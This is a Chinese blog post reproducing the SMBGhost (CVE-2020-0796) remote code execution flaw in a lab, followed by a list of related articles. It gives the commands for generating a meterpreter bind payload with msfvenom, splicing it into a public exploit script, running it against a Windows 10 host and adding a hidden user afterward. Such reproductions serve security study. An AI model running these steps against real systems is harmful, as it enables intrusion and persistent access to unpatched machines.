Windows—永恒之黑提权(CVE-2020-0796)

已于 2023-03-06 15:00:08 修改
阅读量374 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: 安全 网络安全 windows
于 2023-03-03 17:43:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oiadkt/article/details/129324370
版权

        微软发布安全公告披露了一个最新的SMB远程代码执行漏洞(CVE-2020-0796),攻击者利用该漏洞无须权限即可实现远程代码执行,一旦被成功利用,其危害不亚于永恒之蓝,全球 10 万台服务器或成首轮攻击目标。

        SMB(Server Message Block)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台。由于SMB 3.1. 1 协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,受黑客攻击的目标系统只要开机在线即可能被入侵。据了解,凡政府机构、企事业单位网络中采用Windows 101903 之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1 均为潜在攻击目标,Windows7 不受影响

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows 10 Version 1909 for x64-based Systems

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

复现环境

被攻击主机:Windows 10 Version 1903(需要关闭防火墙)

攻击者:kali 

​利用工具:https://github.com/root-tools/SMBGhost_RCE_PoC

  • 先下载漏洞检测工具,使用python脚本对主机ip进行扫描,发现主机存在这个漏洞
git clone https://github.com/ollypwn/SMBGhost

  • 然后再使用msfvenom生成Windows反弹shell的payload
msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=4444 -b '\x00' -f python > paylaod

  • 然后将paylaod中的“buf”替换为“USER_PAYLOAD”
sed "s/buf/USER_PAYLOAD/g" -i payload

sed "92,128 d" -i exploit.py  # 删除exploit.py文件的92行到128行
sed "92r payload" -i exploit.py  #将paylaod文件内容添加到exploit.py的92行后

  • 然后使用msf的侦听模块exploit/multi/handler,尝试与Windows主机的4444端口进行连接

 

  • 然后开始这边开始run,开启4444号端口的监听,打开另外一个窗口来执行 修改过后的exploit的命令
python3 exploit.py -ip 192.168.219.215

  • 提示按一个键执行shellcode,按键但是没反应,后来发现是win10蓝屏了(确实会存在执行后win10死机的情况,重启就好了)

  • win10重启过后,再次执行命令,成功拿到shell

  • 再次连接进去创建隐藏用户,后续再进行windows权限维持等操作了

kukuromi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows提权总结
weixin_68652890的博客
04-05 4815
windows提权总结 文章目录溢出漏洞提权at&sc&ps命令提权数据库提权mysqlUDF提权MOF提权启动项提权sql serverxp_cmdshell提权sp_oacreate提权令牌窃取提权RottenPotato(烂土豆)配合令牌窃取DLL劫持提权不带引号的服务路径配合msf提权安全的服务权限配合MSF提权其他方法 溢出漏洞提权 拿到服务器普通权限→上传溢出程序→提权至administrator。 内核溢出漏洞总结:https://github.com/SecWiki/win
永恒CVE-2020-0796漏洞复现
weixin_46463776的博客
04-15 844
永恒漏洞复现
CVE-2020-0796本地提权利用深入分析
weixin_44045581的博客
06-17 677
CVE-2020-0796本地提权利用深入分析前言压缩数据包解析动态分析SrvNetAllocateBuffer函数分析提权方法解析 前言 2020年3月份,微软发布了关于SMBv3协议的远程代码执行漏洞CVE-2020-0796),攻击者可通过发送构造的恶意数据包,执行任意代码。近日网上出现了本地提权利用,借用这个机会,深入分析下漏洞的具体细节。 此漏洞是由于SMB不能正确处理压缩数据包造成的,已确定漏洞存在于文件srv2.sys中。srv2.sys中处理压缩包数据的函数srv2!Srv2Decompr
windows权限提升总结,作为一名网络安全面试者你应该知道的
最新发布
Python毕设源码程序王哥
04-14 1006
3、kali上 msf 启动监听4、假设将 shell.exe 后门通过之前的漏洞传到上传到目标靶机并点击CMD 执行后门程序5、kali 监听到会话,是web普通权限6、尝试用烂土豆配合令牌窃取提权,假设通过漏洞将烂土豆上传到目标服务器的C盘然后执行以下命令,成功提权
windows10 永恒复现(CVE-2020-0796
qq_53579360的博客
11-13 1463
永恒复现
基于可见-近红外反射光谱技术的葡萄品种鉴别方法的研究
02-10
结果表明, 提葡萄能够被区分。进一步采用人工神经网络技术对马奶子和木拉格两种葡萄进行品种鉴别。以前10个主成分作为神经网络的输入, 品种类型作为神经网络的输出, 建立三层BP神经网络模型。结果显示, 这两个品种...
蓝莓花青素的提取及抗氧化性的研究 (2011年)
05-24
通过单因素试验和正交试验,得出蓝莓花青素提取的最佳工艺条件为:甲醇浓度80%,料液比1∶10,提取温度80℃,提取时间30min,pH为3.5;提取物浓缩后,采用聚酰胺树脂对蓝莓提取物中花青素进行纯化,得率为4.29%,...
matlab的 体辐射计算函数
06-26
erad(t, r1, r2, n) t:体温度: K r1,r2:起始波长、截止波长微米 n:0 计算波段内辐射比例,1计算辐射总能量 输出:单位面积波段内辐射能量 w/m2
ICP原子发射光谱法测定葡萄叶中的8种元素含量 (2001年)
06-12
用电感耦合等离子体(ICP)原子发射光谱法直接测定美国提葡萄的正常叶和枯叶中Cu、Mg、Zn、Mn、Cd、Ni、Al、Fe八种元素的含量.结果表明,此方法简便、可靠,具有良好的精密度和准确性.
CVE-2020-0796永恒漏洞复现 超详细过程(成功复现)
unlash的博客
10-20 4874
CVE-2020-0796永恒漏洞复现 超详细过程 成功复现 msf监听成功反弹shell 漏洞描述 影响版本 修复建议
windows&linux;提权总结
04-24
windows&linux;提权总结,套路,套路,套路,套路套路,套路,套路,。
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
WINDOWS渗透与提权总结(2)
weixin_34176694的博客
03-15 223
vbs 下载者: 01 1: 02   03 echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs 04   05 echo sGe...
Windows系统提权简单总结
Aiwin的博客
07-13 1812
Windows系统提权简单总结
Windows提权方法简单总结
good good study
03-23 9707
提权是后渗透重要的一环节,在权限较低的情况下,我们在进行一些操作如读取/写入敏感文件、权限维持等会受到束缚,所以需要提权。 在实际中我们会碰到工作组和域环境,工作组环境我们提权的目的是从普通用户权限到管理员或者system权限。而域环境中我们通常是从域用户到域管理员权限。
Windows提权姿势总结
qq_53138792的博客
04-02 5124
1、ByPassUAC ByPassUAC 的方法一般有利用系统白名单程序、COM接口以及利用 Windows 自身漏洞等方式。 常见工具有 PowerShell 版的 Yamabiko 和需要自己编译的 C 语言版的 UACME 等,UACME 目前已经支持了72 种 ByPassUAC 的方法。 UACME 项目地址: https://github.com/hfiref0x/UACME.git 克隆 UACME 项目到本地后,使用 VS2019 进行编译,然后运行即可。 例如以下命令,表示使
CVE-2020-0796永恒
Foreverlove112的博客
10-01 1140
CVE-2020-0796永恒
CVE-2020-0796永恒
qq_45455136的博客
05-22 944
CVE-2020-0796漏洞 CVE-2020-0796介绍 漏洞复现 蓝屏分析
Win提权思路,方法,工具(小总结)
zhalang8324的博客
02-26 2299
介绍windows提权总是被归结为适当的枚举。但要完成适当的枚举,你需要知道要检查和查找的内容。这通常需要伴随着经验的丰富而对系统非常熟悉。起初特权升级看起来像是一项艰巨的任务,但过了一段时间,你就开始过滤哪些是正常的东西,而哪些不是正常的东西。最终变得更容易,因为你知道要寻找什么了,而不是挖掘希望在干草堆中找到那根针的所有东西。希望本指南能为你的入门提供良好的基础知识。所以本指南主要集中在枚举方...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值